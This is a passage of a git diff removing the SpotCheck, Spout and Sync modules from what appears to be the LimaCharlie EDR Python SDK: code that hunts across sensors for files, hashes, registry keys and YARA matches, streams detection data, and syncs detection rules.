-            cb_on_check_done (func(Sensor)): callback when a sensor is done with a check.
-            cb_on_start_check (func(Sensor)): callback when a sensor is starting evaluation.
-            cb_on_offline (func(Sensor)): callback when a sensor is offline so checking is delayed.
-            cb_on_error (func(Sensor, stackTrace)): callback when an error occurs while checking a sensor.
-            n_concurrent (int): number of sensors that should be checked concurrently, defaults to 1.
-            n_sec_between_online_checks (int): number of seconds to wait between attempts to check a sensor that is offline, default to 60.
-            is_windows (boolean): if True checks apply to Windows sensors, defaults to True.
-            is_linux (boolean): if True checks apply to Linux sensors, defaults to True.
-            is_macos (boolean): if True checks apply to MacOS sensors, defaults to True.
-            is_chrome (boolean): if True checks apply to Chrome sensors, defaults to True.
-            tags (str): comma-seperated list of tags, sensors must have: either one tag with the "+" prefix, not include all tags with "-" prefix, or the sensor has all tags specified without prefix.
-        '''
-        self._cbCheck = cb_check
-        self._cbOnCheckDone = cb_on_check_done
-        self._cbOnStartCheck = cb_on_start_check
-        self._cbOnOffline = cb_on_offline
-        self._cbOnError = cb_on_error
-        self._nConcurrent = n_concurrent
-        self._nSecBetweenOnlineChecks = n_sec_between_online_checks
-
-        self._isWindows = is_windows
-        self._isLinux = is_linux
-        self._isMacos = is_macos
-        self._isChrome = is_chrome
-
-        self._tags = []
-        self._positiveTags = []
-        self._negativeTags = []
-        if tags is not None:
-            for tag in tags:
-                if tag.startswith( '+' ):
-                    self._positiveTags.append( tag[1:] )
-                elif tag.startswith( '-' ):
-                    self._negativeTags.append( tag[1:] )
-                else:
-                    self._tags.append( tag )
-
-        self._threads = []
-        self._stopEvent = threading.Event()
-
-        self._sensorsLeftToCheck = Queue()
-        self._lock = threading.Lock()
-        self._pendingReCheck = 0
-
-        self._lc = Manager( oid, secret_api_key, inv_id = 'spotcheck-%s' % str( uuid.uuid4() )[ : 4 ], is_interactive = True, extra_params = extra_params )
-
-    def start( self ):
-        '''Start the SpotCheck process, returns immediately.
-        '''
-        # We start by listing all the sensors in the org using paging.
-        for sensor in self._lc.sensors():
-            self._sensorsLeftToCheck.put( sensor )
-
-        # Now that we have a list of sensors, we'll spawn n_concurrent spot checks,
-        for _ in range( self._nConcurrent ):
-            t = threading.Thread( target = self._performSpotChecks )
-            self._threads.append( t )
-            t.start()
-
-        # Done, the threads will do the checks.
-
-    def stop( self ):
-        '''Stop the SpotCheck process, returns once activity has stopped.
-        '''
-        self._stopEvent.set()
-        self.wait()
-
-    def wait( self, timeout = None ):
-        '''Wait for SpotCheck to be complete, or timeout occurs.
-
-        Args:
-            timeout (float): if specified, number of seconds to wait for SpotCheck to complete.
-
-        Returns:
-            True if SpotCheck is finished, False if a timeout was specified and reached before the SpotCheck is done.
-        '''
-        all_done = True
-        for t in self._threads:
-            t.join( timeout = timeout )
-            all_done = all_done & (not t.is_alive())
-
-        return all_done
-
-    def _performSpotChecks( self ):
-        while not self._stopEvent.wait( timeout = 0 ):
-            try:
-                sensor = self._sensorsLeftToCheck.get_nowait()
-            except:
-                # Check to see if some sensors are pending a re-check
-                # after being offline.
-                with self._lock:
-                    # If there are no more sensors to check, we can exit.
-                    if 0 == self._pendingReCheck and 0 == self._sensorsLeftToCheck.qsize():
-                        return
-                time.sleep( 2 )
-                continue
-
-            # Check to see if the platform matches
-            if self._isWindows is False or self._isLinux is False or self._isMacos is False or self._isChrome is False:
-                platform = sensor.getInfo()[ 'plat' ]
-                arch = sensor.getInfo()[ 'arch' ]
-                if platform == 'windows' and not self._isWindows:
-                    continue
-                if platform == 'linux' and not self._isLinux:
-                    continue
-                if platform == 'macos' and not self._isMacos:
-                    continue
-                if arch == 'chrome' and not self._isChrome:
-                    continue
-
-            # If tags were set, check the sensor have them.
-            if len( self._tags ) != 0 or len( self._positiveTags ) != 0 or len( self._negativeTags ) != 0:
-                sensorTags = sensor.getTags()
-                isTagsMatch = False
-                for tag in self._positiveTags:
-                    if tag in sensorTags:
-                        isTagsMatch = True
-                        break
-                isNegativeMatch = False
-                for tag in self._negativeTags:
-                    if tag in sensorTags:
-                        isNegativeMatch = True
-                        break
-                if isNegativeMatch:
-                    continue
-                # If no + tags are specified, we match
-                # if all normal tags are there OR if no
-                # normal tags are specified.
-                if ( not isTagsMatch ) and ( len( self._positiveTags ) == 0 or len( self._tags ) != 0 ):
-                    if all( [ ( x in sensorTags ) for x in self._tags ] ):
-                        isTagsMatch = True
-                if not isTagsMatch:
-                    continue
-
-            # Check to see if the sensor is online.
-            if not sensor.isOnline():
-                if self._cbOnOffline is not None:
-                    self._cbOnOffline( sensor )
-
-                # Re-add it to sensors to check, after the timeout.
-                def _doReCheck( s ):
-                    if self._stopEvent.wait( timeout = self._nSecBetweenOnlineChecks ):
-                        return
-                    with self._lock:
-                        self._sensorsLeftToCheck.put( s )
-                        self._pendingReCheck -= 1
-                with self._lock:
-                    self._pendingReCheck += 1
-                t = threading.Thread( target = _doReCheck, args = ( sensor, ) )
-                self._threads.append( t )
-                t.start()
-                continue
-
-            if self._cbOnStartCheck is not None:
-                self._cbOnStartCheck( sensor )
-
-            # By this point we have a sensor and it's likely online.
-            try:
-                result = self._cbCheck( sensor )
-            except:
-                # On errors, we notify the callback but assume any retry
-                # is likely to also fail so we won't retry.
-                if self._cbOnError is not None:
-                    self._cbOnError( sensor, traceback.format_exc() )
-                result = True
-            if not result:
-                # We assume the sensor was somehow offline.
-                if self._cbOnOffline is not None:
-                    self._cbOnOffline( sensor )
-                # Re-add it to sensors to check, after the timeout.
-                time.sleep( self._nSecBetweenOnlineChecks )
-                self._sensorsLeftToCheck.put( sensor )
-                continue
-
-            # This means the check was done successfully.
-            if self._cbOnCheckDone is not None:
-                self._cbOnCheckDone( sensor )
-
-def main( sourceArgs = None ):
-    import argparse
-    import getpass
-
-    parser = argparse.ArgumentParser( prog = 'limacharlie spotcheck' )
-    parser.add_argument( '-o', '--oid',
-                         type = lambda x: str( uuid.UUID( x ) ),
-                         required = False,
-                         dest = 'oid',
-                         help = 'the OID to authenticate as, if not specified global creds are used.' )
-    parser.add_argument( '-t', '--tag',
-                         type = str,
-                         required = False,
-                         dest = 'tag',
-                         default = None,
-                         help = 'tag sensors where a match is found with this tag.' )
-    parser.add_argument( '-tt', '--tag-ttl',
-                         type = int,
-                         required = False,
-                         dest = 'tag_ttl',
-                         default = 60 * 60 * 24 * 7,
-                         help = 'ttl of the tag to set.' )
-    parser.add_argument( '-n', '--n-concurrent',
-                         type = int,
-                         required = False,
-                         default = 1,
-                         dest = 'nConcurrent',
-                         help = 'number of agents to spot-check concurrently.' )
-    parser.add_argument( '--no-windows',
-                         action = 'store_false',
-                         default = True,
-                         required = False,
-                         dest = 'is_windows',
-                         help = 'do NOT apply to Windows agents.' )
-    parser.add_argument( '--no-linux',
-                         action = 'store_false',
-                         default = True,
-                         required = False,
-                         dest = 'is_linux',
-                         help = 'do NOT apply to Linux agents.' )
-    parser.add_argument( '--no-macos',
-                         action = 'store_false',
-                         default = True,
-                         required = False,
-                         dest = 'is_macos',
-                         help = 'do NOT apply to MacOS agents.' )
-    parser.add_argument( '--no-chrome',
-                         action = 'store_false',
-                         default = True,
-                         required = False,
-                         dest = 'is_chrome',
-                         help = 'do NOT apply to Chrome agents.' )
-    parser.add_argument( '--tags',
-                         type = lambda x: [ _.strip().lower() for _ in x.split( ',' ) if _.strip() != '' ],
-                         required = False,
-                         default = None,
-                         dest = 'tags',
-                         help = 'comma-seperated list of tags, sensors must have: either one tag with the "+" prefix, not include all tags with "-" prefix, or the sensor has all tags specified without prefix.' )
-    parser.add_argument( '--extra-params',
-                         type = lambda x: json.loads( x ),
-                         required = False,
-                         default = {},
-                         dest = 'extra_params',
-                         help = 'extra parameters to pass to the manager.' )
-    parser.add_argument( '-f', '--file',
-                         action = 'append',
-                         required = False,
-                         default = [],
-                         dest = 'files',
-                         help = 'file to look for.' )
-    parser.add_argument( '-fp', '--file-pattern',
-                         action = 'append',
-                         nargs = 3,
-                         required = False,
-                         default = [],
-                         dest = 'filepatterns',
-                         help = 'takes 3 arguments, first is a directory, second is a file pattern like "*.exe", third is the depth of recursion in the directory.' )
-    parser.add_argument( '-fh', '--file-hash',
-                         action = 'append',
-                         nargs = 4,
-                         required = False,
-                         default = [],
-                         dest = 'filehashes',
-                         help = 'takes 3 arguments, first is a directory, second is a file pattern like "*.exe", third is the depth of recursion in the directory and the fourth is the sha256 hash to look for.' )
-    parser.add_argument( '-rk', '--registry-key',
-                         action = 'append',
-                         required = False,
-                         default = [],
-                         dest = 'registrykeys',
-                         help = 'registry key to look for.' )
-    parser.add_argument( '-rv', '--registry-value',
-                         action = 'append',
-                         nargs = 2,
-                         required = False,
-                         default = [],
-                         dest = 'registryvalues',
-                         help = 'takes 2 arguments, first is a registry key, second is the value to look for in the key.' )
-    parser.add_argument( '-y', '--yara',
-                         action = 'append',
-                         required = False,
-                         default = [],
-                         dest = 'yarasystem',
-                         help = 'yara signature file path to scan system-wide with (expensive).' )
-    parser.add_argument( '-yf', '--yara-file',
-                         action = 'append',
-                         nargs = 4,
-                         required = False,
-                         default = [],
-                         dest = 'yarafiles',
-                         help = 'takes 4 arguments, first is a file path to yara signature, second is a directory, third is a file pattern (like "*.exe"), fourth is directory recursion depth.' )
-    parser.add_argument( '-yp', '--yara-process',
-                         action = 'append',
-                         nargs = 2,
-                         required = False,
-                         default = [],
-                         dest = 'yaraprocesses',
-                         help = 'takes 2 arguments, first is a file path to yara signature, second is a process executable path pattern to scan memory and files.' )
-    parser.add_argument( '-r', '--run',
-                         action = 'append',
-                         required = False,
-                         default = [],
-                         dest = 'runs',
-                         help = 'a command to run against each sensor.' )
-    parser.add_argument( '-l', '--log-get',
-                         action = 'append',
-                         required = False,
-                         default = [],
-                         dest = 'logs',
-                         help = 'logs to look for.' )
-    parser.add_argument( '--is-ignore-certs',
-                         action = 'store_true',
-                         default = False,
-                         required = False,
-                         dest = 'is_ignore_certs',
-                         help = 'ignore SSL cert errors for logs and payloads.' )
-
-    args = parser.parse_args( sourceArgs )
-
-    # Get creds if we need them.
-    if args.oid is not None:
-        secretApiKey = getpass.getpass( prompt = 'Enter secret API key: ' )
-    else:
-        secretApiKey = None
-
-    def _genericSpotCheck( sensor ):
-        for file in args.files:
-            response = sensor.simpleRequest( 'file_info "%s"' % file.replace( '\\', '\\\\' ), timeout = 30 )
-            if not response:
-                raise Exception( 'timeout' )
-
-            if 0 != response[ 'event' ].get( 'ERROR', 0 ):
-                # File probably not found.
-                continue
-
-            # File was found.
-            fileInfo = response[ 'event' ]
-
-            # Try to ge the hash.
-            response = sensor.simpleRequest( 'file_hash "%s"' % file.replace( '\\', '\\\\' ), timeout = 30 )
-            if not response:
-                raise Exception( 'timeout' )
-
-            fileHash = None
-            if 0 == response[ 'event' ].get( 'ERROR', 0 ):
-                # We got a hash.
-                fileHash = response[ 'event' ]
-
-            _reportHit( sensor, { 'file_info' : fileInfo, 'file_hash' : fileHash } )
-
-        for directory, filePattern, depth in args.filepatterns:
-            response = sensor.simpleRequest( 'dir_list "%s" "%s" -d %s' % ( directory.replace( "\\", "\\\\" ), filePattern, depth ), timeout = 30 )
-            if not response:
-                raise Exception( 'timeout' )
-
-            for entry in response[ 'event' ][ 'DIRECTORY_LIST' ]:
-                _reportHit( sensor, { 'file_info' : entry } )
-
-        for directory, filePattern, depth, hash in args.filehashes:
-            if 64 != len( hash ):
-                raise Exception( 'hash not valid sha256' )
-            try:
-                hash.decode( 'hex' )
-            except:
-                try:
-                    bytes.fromhex( hash )
-                except:
-                    raise Exception( 'hash contains invalid characters' )
-            response = sensor.simpleRequest( 'dir_find_hash "%s" "%s" %s --depth %s' % ( directory.replace( "\\", "\\\\" ), filePattern, hash, depth ), timeout = 3600 )
-            if not response:
-                raise Exception( 'timeout' )
-
-            for entry in response[ 'event' ][ 'DIRECTORY_LIST' ]:
-                _reportHit( sensor, { 'file_hash' : entry } )
-
-        for regKey in args.registrykeys:
-            response = sensor.simpleRequest( 'reg_list "%s"' % ( regKey.replace( '\\', '\\\\' ), ), timeout = 30 )
-            if not response:
-                raise Exception( 'timeout' )
-
-            if 0 != response[ 'event' ][ 'ERROR' ]:
-                # Registry probably not found.
-                continue
-
-            _reportHit( sensor, { 'reg_key' : response[ 'event' ] } )
-
-        for regKey, regVal in args.registryvalues:
-            response = sensor.simpleRequest( 'reg_list "%s"' % ( regKey.replace( '\\', '\\\\' ), ), timeout = 30 )
-            if not response:
-                raise Exception( 'timeout' )
-
-            if 0 != response[ 'event' ][ 'ERROR' ]:
-                # Registry probably not found.
-                continue
-
-            for valEntry in response[ 'event' ][ 'REGISTRY_VALUE' ]:
-                if valEntry.get( 'NAME', '' ).lower() == regVal.lower():
-                    _reportHit( sensor, { 'reg_key' : response[ 'event' ][ 'ROOT' ], 'reg_value' : valEntry } )
-
-        for yaraSigFile in args.yarasystem:
-            with open( yaraSigFile, 'rb' ) as f:
-                yaraSig = base64.b64encode( f.read() ).decode()
-            future = sensor.request( 'yara_scan %s --is-no-validation' % ( yaraSig, ) )
-            _handleYaraTasking( sensor, future )
-
-        for yaraSigFile, directory, filePattern, depth in args.yarafiles:
-            with open( yaraSigFile, 'rb' ) as f:
-                yaraSig = base64.b64encode( f.read() ).decode()
-            response = sensor.simpleRequest( 'dir_list "%s" "%s" -d %s' % ( directory.replace( "\\", "\\\\" ), filePattern, depth ), timeout = 30 )
-            if not response:
-                raise Exception( 'timeout' )
-            for fileEntry in response[ 'event' ][ 'DIRECTORY_LIST' ]:
-                filePath = fileEntry.get( 'FILE_PATH', None )
-                if filePath is None:
-                    continue
-                future = sensor.request( 'yara_scan %s --is-no-validation -f "%s"' % ( yaraSig, filePath.replace( "\\", "\\\\" ) ) )
-                _handleYaraTasking( sensor, future )
-
-        for yaraSigFile, procPattern in args.yaraprocesses:
-            with open( yaraSigFile, 'rb' ) as f:
-                yaraSig = base64.b64encode( f.read() ).decode()
-            future = sensor.request( 'yara_scan %s --is-no-validation -e %s' % ( yaraSig, procPattern.replace( '\\', '\\\\' ) ) )
-            _handleYaraTasking( sensor, future )
-
-        for run in args.runs:
-            response = sensor.simpleRequest( run )
-            if not response:
-                raise Exception( 'timeout' )
-
-            _reportHit( sensor, response[ 'event' ] )
-
-        for log in args.logs:
-            cert = ''
-            if args.is_ignore_certs:
-                cert = '--is-ignore-cert'
-            response = sensor.simpleRequest( 'log_get --file "%s" %s' % ( log.replace( '\\', '\\\\' ), cert ), timeout = 30 )
-            if not response:
-                raise Exception( 'timeout' )
-
-            retCode = response[ 'event' ].get( 'ERROR', None )
-            if 200 != retCode:
-                raise Exception( 'failed: %s' % ( retCode, ) )
-
-            _reportHit( sensor, response[ 'event' ] )
-
-        return True
-
-    def _handleYaraTasking( sensor, future ):
-        isDone = False
-        while True:
-            responses = future.getNewResponses( timeout = 3600 )
-            if not responses:
-                raise Exception( 'timeout' )
-            for response in responses:
-                if 'done' == response[ 'event' ].get( 'ERROR_MESSAGE', None ):
-                    isDone = True
-                    continue
-                if 0 == response[ 'event' ].get( 'ERROR', 0 ):
-                    # We got a hit, we don't care about individual hits right now.
-                    _reportHit( sensor, { 'yara' : response[ 'event' ] } )
-                else:
-                    # Ignore if we failed to scan file.
-                    pass
-
-            if isDone:
-                break
-
-    def _reportHit( sensor, mtd ):
-        print( "! (%s / %s): %s" % ( sensor, sensor.hostname(), json.dumps( mtd  ) ) )
-        sys.stdout.flush()
-        if args.tag is not None:
-            sensor.tag( args.tag, args.tag_ttl )
-
-    def _onError( sensor, error ):
-        print( "X (%s / %s): %s" % ( sensor, sensor.hostname(), error ) )
-        sys.stdout.flush()
-
-    def _onOffline( sensor ):
-        print( "? (%s / %s)" % ( sensor, sensor.hostname() ) )
-        sys.stdout.flush()
-
-    def _onDone( sensor ):
-        print( ". (%s / %s)" % ( sensor, sensor.hostname() ) )
-        sys.stdout.flush()
-
-    def _onStartCheck( sensor ):
-        print( "> (%s / %s)" % ( sensor, sensor.hostname() ) )
-        sys.stdout.flush()
-
-    checker = SpotCheck( args.oid,
-                         secretApiKey,
-                         _genericSpotCheck,
-                         n_concurrent = args.nConcurrent,
-                         cb_on_start_check = _onStartCheck,
-                         cb_on_check_done = _onDone,
-                         cb_on_offline = _onOffline,
-                         cb_on_error = _onError,
-                         is_windows = args.is_windows,
-                         is_linux = args.is_linux,
-                         is_macos = args.is_macos,
-                         is_chrome = args.is_chrome,
-                         tags = args.tags,
-                         extra_params = args.extra_params )
-    checker.start()
-    checker.wait( 60 * 60 * 24 * 30 * 365 )
-
-if __name__ == "__main__":
-    main()
diff --git a/limacharlie/Spout.py b/limacharlie/Spout.py
deleted file mode 100644
index b02d25e5..00000000
--- a/limacharlie/Spout.py
+++ /dev/null
@@ -1,267 +0,0 @@
-# Detect if this is Python 2 or 3
-import sys
-_IS_PYTHON_2 = False
-if sys.version_info[ 0 ] < 3:
-    _IS_PYTHON_2 = True
-
-if _IS_PYTHON_2:
-    from urllib2 import urlopen
-    from Queue import Queue
-    from Queue import Empty
-else:
-    from urllib.request import urlopen
-    from queue import Queue
-    from queue import Empty
-
-import threading
-import sys
-import json
-import requests
-import uuid
-import time
-
-from .utils import LcApiException
-
-_CLOUD_KEEP_ALIVES = 60
-_TIMEOUT_SEC = ( _CLOUD_KEEP_ALIVES * 2 ) + 1
-
-class Spout( object ):
-    '''Listener object to receive data (Events, Detects or Audit) from a limacharlie.io Organization in pull mode.'''
-
-    def __init__( self, man, data_type, is_parse = True, max_buffer = 1024, inv_id = None, tag = None, cat = None, sid = None, extra_params = {} ):
-        '''Connect to limacharlie.io to start receiving data.
-
-        Args:
-            manager (limacharlie.Manager obj): a Manager to use for interaction with limacharlie.io.
-            data_typer (str): the type of data received from the cloud as specified in Outputs (event, detect, audit).
-            is_parse (bool): if set to True (default) the data will be parsed as JSON to native Python.
-            max_buffer (int): the maximum number of messages to buffer in the queue.
-            inv_id (str): only receive events marked with this investigation ID.
-            tag (str): only receive Events from Sensors with this Tag.
-            cat (str): only receive Detections of this Category.
-            sid (str): only receive Events or Detections from this Sensor.
-        '''
-
-        self._man = man
-        self._oid = man._oid
-        self._uid = man._uid
-        self._data_type = data_type
-        self._cat = cat
-        self._tag = tag
-        self._invId = inv_id
-        self._sid = sid
-        self._is_parse = is_parse
-        self._max_buffer = max_buffer
-        self._dropped = 0
-
-        self._isStop = False
-
-        # This is used to register FutureResults objects where data should go
-        # based on the full value of an investigation ID (including the custom tracking after "/").
-        self._futures = {}
-
-        if self._data_type not in ( 'event', 'detect', 'audit', 'deployment', 'billing' ):
-            raise LcApiException( 'Invalid data type: %s' % self._data_type )
-
-        # Setup internal structures.
-        self.queue = Queue( maxsize = self._max_buffer )
-        self._threads = []
-
-        # Connect to limacharlie.io.
-        spoutParams = { 'type' : self._data_type }
-        if man._secret_api_key:
-            spoutParams[ 'api_key' ] = man._secret_api_key
-        else:
-            spoutParams[ 'jwt' ] = man._jwt
-        if inv_id is not None:
-            spoutParams[ 'inv_id' ] = self._invId
-        if tag is not None:
-            spoutParams[ 'tag' ] = self._tag
-        if cat is not None:
-            spoutParams[ 'cat' ] = self._cat
-        if sid is not None:
-            spoutParams[ 'sid' ] = self._sid
-        if self._uid:
-            spoutParams[ 'uid' ] = self._uid
-        for k, v in extra_params.items():
-            spoutParams[ k ] = v
-        # Spouts work by doing a POST to the stream.limacharlie.io service with the
-        # OID, Secret Key and any Output parameters we want. The HTTP response will
-        # be a stream of data.
-        self._hConn = self._getStream( spoutParams )
-        if self._hConn.status_code != 200:
-            raise LcApiException( 'failed to open Spout (%s): %s' % ( self._hConn.status_code, self._hConn.text ) )
-        handleConnectionThread = threading.Thread( target = self._handleConnection, args = ( spoutParams, ) )
-        handleConnectionThread.daemon = True
-        self._threads.append( handleConnectionThread )
-        handleConnectionThread.start()
-        self._futureCleanupInterval = 30
-        cleanupFuturesThread = threading.Thread( target = self._cleanupFutures )
-        cleanupFuturesThread.daemon = True
-        cleanupFuturesThread.start()
-
-    def _getStream( self, spoutParams ):
-        return requests.post( 'https://stream-tmp.limacharlie.io/%s' % ( self._oid, ),
-                              data = spoutParams,
-                              stream = True,
-                              allow_redirects = False,
-                              timeout = _TIMEOUT_SEC )
-
-    def _cleanupFutures( self ):
-        while not self._isStop:
-            time.sleep( self._futureCleanupInterval )
-            now = time.time()
-            for trackingId, futureInfo in list( self._futures.items() ):
-                ttl = futureInfo[ 1 ]
-                if ttl < now:
-                    self._futures.pop( trackingId, None )
-
-    def shutdown( self ):
-        '''Stop receiving data.'''
-
-        if self._isStop:
-            return
-
-        self._isStop = True
-
-        if self._hConn is not None:
-            try:
-                self._hConn.close()
-            except:
-                # Ignore errors on shutdown. In python 3 there
-                # can be a reentrant exception because of the BufferedIO
-                # and HTTPResponse object at close time.
-                pass
-            self._hConn = None
-
-        for th in self._threads:
-            th.join( timeout = 2 )
-
-    def getDropped( self ):
-        '''Get the number of messages dropped because queue was full.'''
-        return self._dropped
-
-    def resetDroppedCounter( self ):
-        '''Reset the counter of dropped messages.'''
-        self._dropped = 0
-
-    def registerFutureResults( self, tracking_id, future, ttl = ( 60 * 60 * 1 ) ):
-        '''Register a FutureResults to receive events coming with a specific tracking ID and investigation ID.
-
-        Args:
-            tracking_id (str): the full value of the investigation_id field to match on, including the custom tracking after the "/".
-            future (limacharlie.FutureResults): future to receive the events.
-            ttl (int): number of seconds this future should be tracked.
-        '''
-        self._futures[ tracking_id ] = ( future, time.time() + ttl )
-
-    def _handleConnection( self, spoutParams ):
-        while not self._isStop:
-            self._man._printDebug( "Stream started." )
-            try:
-                for line in self._hConn.iter_lines( chunk_size = 1024 * 1024 * 10 ):
-                    try:
-                        if self._is_parse:
-                            line = json.loads( line.decode() )
-                            # The output.limacharlie.io service also injects a
-                            # few trace messages like keepalives and number of
-                            # events dropped (if any) from the server (indicating
-                            # we are too slow). We filter those out here.
-                            if '__trace' in line:
-                                if 'dropped' == line[ '__trace' ]:
-                                    self._dropped += int( line[ 'n' ] )
-                            else:
-                                future = self._futures.get( line.get( 'routing', {} ).get( 'investigation_id', None ), None )
-                                if future is not None:
-                                    future[ 0 ]._addNewResult( line )
-                                else:
-                                    self.queue.put_nowait( line )
-                        else:
-                            self.queue.put_nowait( line )
-                    except:
-                        self._dropped += 1
-            except Exception as e:
-                if not self._isStop:
-                    self._man._printDebug( "Stream closed: %s" % str( e ) )
-                else:
-                    self._man._printDebug( "Stream closed." )
-            finally:
-                self._man._printDebug( "Stream closed." )
-
-            if not self._isStop:
-                self._hConn = self._getStream( spoutParams )
-
-def _printToStderr( msg ):
-    sys.stderr.write( str( msg ) + '\n' )
-
-def main( sourceArgs = None ):
-    import argparse
-    import getpass
-    import signal
-    import limacharlie
-
-    parser = argparse.ArgumentParser( prog = 'limacharlie.io spout' )
-    parser.add_argument( 'data_type',
-                         type = str,
-                         help = 'the type of data to receive in spout, one of "event", "detect" or "audit".' )
-    parser.add_argument( '-o', '--oid',
-                         type = lambda x: str( uuid.UUID( x ) ),
-                         required = False,
-                         dest = 'oid',
-                         help = 'the OID to authenticate as, if not specified global creds are used.' )
-    parser.add_argument( '-i', '--investigation-id',
-                         type = str,
-                         dest = 'inv_id',
-                         default = None,
-                         help = 'spout should only receive events marked with this investigation id.' )
-    parser.add_argument( '-t', '--tag',
-                         type = str,
-                         dest = 'tag',
-                         default = None,
-                         help = 'spout should only receive events from sensors tagged with this tag.' )
-    parser.add_argument( '-c', '--category',
-                         type = str,
-                         dest = 'cat',
-                         default = None,
-                         help = 'spout should only receive detections from this category.' )
-    parser.add_argument( '-s', '--sid',
-                         type = lambda x: str( uuid.UUID( x ) ),
-                         dest = 'sid',
-                         default = None,
-                         help = 'spout should only receive detections or events from this sensor.' )
-    args = parser.parse_args( sourceArgs)
-
-    if args.oid is not None:
-        secretApiKey = getpass.getpass( prompt = 'Enter secret API key: ' )
-    else:
-        secretApiKey = None
-
-    _printToStderr( "Registering..." )
-    man = limacharlie.Manager( oid = args.oid, secret_api_key = secretApiKey )
-    sp = limacharlie.Spout( man,
-                            args.data_type,
-                            inv_id = args.inv_id,
-                            tag = args.tag,
-                            cat = args.cat,
-                            sid = args.sid )
-
-    def _signal_handler( signum, frame ):
-        _printToStderr( 'You pressed Ctrl+C!' )
-        hTh = threading.Thread( target = sp.shutdown() )
-        hTh.daemon = True
-        hTh.start()
-
-    signal.signal( signal.SIGINT, _signal_handler )
-
-    _printToStderr( "Starting to listen..." )
-    while not sp._isStop:
-        try:
-            data = sp.queue.get( timeout = 1 )
-        except Empty:
-            continue
-        print( json.dumps( data, indent = 2 ) )
-
-    _printToStderr( "Exiting." )
-
-if __name__ == "__main__":
-    main()
\ No newline at end of file
diff --git a/limacharlie/Sync.py b/limacharlie/Sync.py
deleted file mode 100644
index 570ea605..00000000
--- a/limacharlie/Sync.py
+++ /dev/null
@@ -1,641 +0,0 @@
-from .Manager import Manager
-from .Replicants import Integrity
-from .Replicants import Logging
-from .Replicants import Exfil
-from .utils import _isStringCompat
-
-# Detect if this is Python 2 or 3
-import sys
-_IS_PYTHON_2 = False
-if sys.version_info[ 0 ] < 3:
-    _IS_PYTHON_2 = True
-
-import uuid
-import os
-import sys
-import yaml
-import json
-
-class LcConfigException( Exception ):
-    pass
-
-class Sync( object ):
-    '''Sync object to fetch and apply configs to and from organizations.'''
-
-    def __init__( self, oid = None, env = None, manager = None ):
-        '''Create a Sync object.
-
-        Args:
-            oid (str): organization ID to operate on.
-            env (str): environment name to use.
-            manager (limacharlie.Manager): Manager object to use instead.
-        '''
-
-        sys.stderr.write("Sync is now deprecated in favor of Configs...\n")
-        sys.stderr.flush()
-
-        self._confVersion = 2
-        if manager is None:
-            self._man = Manager( oid = oid, environment = env )
-        else:
-            self._man = manager
-
-    def _coreRuleContent( self, rule ):
-        return { k : v for k, v in rule.items() if k in ( 'name', 'detect', 'respond', 'namespace' ) }
-
-    def _coreFPContent( self, rule ):
-        return { k : v for k, v in rule.items() if k in ( 'name', 'data' ) }
-
-    def _coreOutputContent( self, output ):
-        return { k : v for k, v in output.items() if k != 'name' }
-
-    def _coreIntegrityContent( self, rule ):
-        rule = { k : v for k, v in rule.items() if k not in ( 'by', 'updated' ) }
-        rule[ 'tags' ] = rule[ 'filters' ][ 'tags' ]
-        rule[ 'platforms' ] = rule[ 'filters' ][ 'platforms' ]
-        del( rule[ 'filters' ] )
-        return rule
-
-    def _coreLoggingContent( self, rule ):
-        rule = { k : v for k, v in rule.items() if k not in ( 'by', 'updated' ) }
-        rule[ 'tags' ] = rule[ 'filters' ][ 'tags' ]
-        rule[ 'platforms' ] = rule[ 'filters' ][ 'platforms' ]
-        del( rule[ 'filters' ] )
-        return rule
-
-    def _coreExfilContent( self, rule ):
-        rule = { k : v for k, v in rule.items() if k not in ( 'by', 'updated' ) }
-        rule[ 'tags' ] = rule[ 'filters' ][ 'tags' ]
-        rule[ 'platforms' ] = rule[ 'filters' ][ 'platforms' ]
-        del( rule[ 'filters' ] )
-        return rule
-
-    def _isJsonEqual( self, a, b ):
-        if json.dumps( a, sort_keys = True ) != json.dumps( b, sort_keys = True ):
-            return False
-
-        return True
-
-    def fetch( self, toConfigFile, isNoRules = False, isNoFPs = False, isNoOutputs = False, isNoIntegrity = False, isNoLogging = False, isNoExfil = False, isNoResources = False ):
-        '''Retrieves the effective configuration in the cloud to a local config file.
-
-        Args:
-            toConfigFile (str, dict): the path to the local config file or dict where to store config.
-        '''
-        if not isinstance( toConfigFile, dict ):
-            toConfigFile = os.path.abspath( toConfigFile )
-            asConf = { 'version' : self._confVersion }
-        else:
-            asConf = toConfigFile
-        if not isNoRules:
-            rules = {}
-            # Check which namespaces we have access to.
-            availableNamespaces = []
-            if self._man.testAuth( permissions = [ 'dr.list' ] ):
-                availableNamespaces.append( 'general' )
-            if self._man.testAuth( permissions = [ 'dr.list.managed' ] ):
-                availableNamespaces.append( 'managed' )
-            if self._man.testAuth( permissions = [ 'dr.list.replicant' ] ):
-                availableNamespaces.append( 'replicant' )
-
-            # Fetch the rules from all the namespaces we have access to.
-            for namespace in availableNamespaces:
-                rules.update( self._man.rules( namespace = namespace ) )
-
-            for ruleName, rule in list( rules.items() ):
-                # Special rules from replicants are ignored.
-                if ruleName.startswith( '__' ):
-                    del( rules[ ruleName ] )
-                    continue
-                rules[ ruleName ] = self._coreRuleContent( rule )
-            asConf[ 'rules' ] = rules
-        if not isNoFPs:
-            rules = {}
-            fps = self._man.fps()
-
-            for ruleName, rule in list( fps.items() ):
-                rules[ ruleName ] = self._coreFPContent( rule )
-            asConf[ 'fps' ] = rules
-        if not isNoOutputs:
-            outputs = self._man.outputs()
-            for outputName, output in outputs.items():
-                outputs[ outputName ] = self._coreOutputContent( output )
-            asConf[ 'outputs' ] = outputs
-        if not isNoIntegrity:
-            integrityRules = Integrity( self._man ).getRules()
-            for ruleName, rule in integrityRules.items():
-                integrityRules[ ruleName ] = self._coreIntegrityContent( rule )
-            asConf[ 'integrity' ] = integrityRules
-        if not isNoLogging:
-            loggingRules = Logging( self._man ).getRules()
-            for ruleName, rule in loggingRules.items():
-                loggingRules[ ruleName ] = self._coreLoggingContent( rule )
-            asConf[ 'logging' ] = loggingRules
-        if not isNoExfil:
-            exfilRules = Exfil( self._man ).getRules()
-            for ruleName, rule in exfilRules[ 'watch' ].items():
-                if '' == rule[ 'operator' ]:
-                    # This is a [secret] rule, let's not mirror it since
-                    # it is handled by a Service.
-                    continue
-                exfilRules[ 'watch' ][ ruleName ] = self._coreExfilContent( rule )
-            for ruleName, rule in exfilRules[ 'list' ].items():
-                exfilRules[ 'list' ][ ruleName ] = self._coreExfilContent( rule )
-            asConf[ 'exfil' ] = exfilRules
-        if not isNoResources:
-            asConf[ 'resources' ] = self._man.getSubscriptions()
